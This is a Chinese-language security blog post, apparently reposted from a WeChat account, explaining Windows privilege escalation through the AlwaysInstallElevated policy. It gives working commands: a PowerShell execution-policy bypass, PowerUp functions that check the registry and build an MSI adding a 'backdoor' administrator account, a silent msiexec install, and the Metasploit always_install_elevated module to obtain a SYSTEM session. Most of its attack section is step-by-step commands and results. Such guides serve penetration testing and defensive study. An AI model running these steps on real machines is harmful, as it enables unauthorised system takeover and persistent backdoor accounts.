[windows提权] 注册表AlwaysInstallElevated提权

  • A+
所属分类:安全文章

一、提权简介

注册表AlwaysInstallElevated是策略设置项,允许低权限用户以system权限运行安装文件,powerup中的Get-RegistryAlwaysInstallElevate模块可用来检查注册表键是否被设置。如果为Ture就证明是以system权限运行的,可提权。



二、漏洞环境配置

①"运行"中输入gpedit.msc,打开组策略管理器

②计算机配置-->管理模板-->Windows 组件-->Windows Installer

[windows提权] 注册表AlwaysInstallElevated提权


③将"永远以高特权进行安装"编辑,选择开启

[windows提权] 注册表AlwaysInstallElevated提权


④用户配置-->管理模板-->Windows 组件-->Windows Installer中的"永远以高特权进行安装"编辑,也同样选择开启



三、提权操作

-使用powerup进行提权:

①以本地加载方式运行powerup,需要上传powerup.ps1到目标

powershell -exec bypass "import-module .powerup.ps1;Get-RegistryAlwaysInstallElevated"

[windows提权] 注册表AlwaysInstallElevated提权

返回为Ture,存在提权漏洞


②利用Write-UserAddMSI模块生成msi文件

powershell -exec bypass "import-module .powerup.ps1;Write-UserAddMSI"

[windows提权] 注册表AlwaysInstallElevated提权

可以看到在当前目录下成功生成msi文件


③以普通用户身份运行此msi文件

msiexec.exe /quiet /qn /i UserAdd.msi

[windows提权] 注册表AlwaysInstallElevated提权

成功添加用户backdoor,权限为管理员



-使用MSF进行提权:

MSF的exploit/windows/local/always_install_elevate模块可以自动完成提权操作,会创建一个随机文件名的msi文件,并在提权成功后删除此mai文件,攻击成功会返回system权限会话


①首先拿到一个不是最高权限的会话

getuid

[windows提权] 注册表AlwaysInstallElevated提权


②利用对应模块进行提权

use exploit/windows/local/always_install_elevatedset session 4run

[windows提权] 注册表AlwaysInstallElevated提权


攻击成功,返回了session 5


③查看session5的权限

getuid

[windows提权] 注册表AlwaysInstallElevated提权

成功提权至system

本文始发于微信公众号(哈拉少安全小队):[windows提权] 注册表AlwaysInstallElevated提权

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: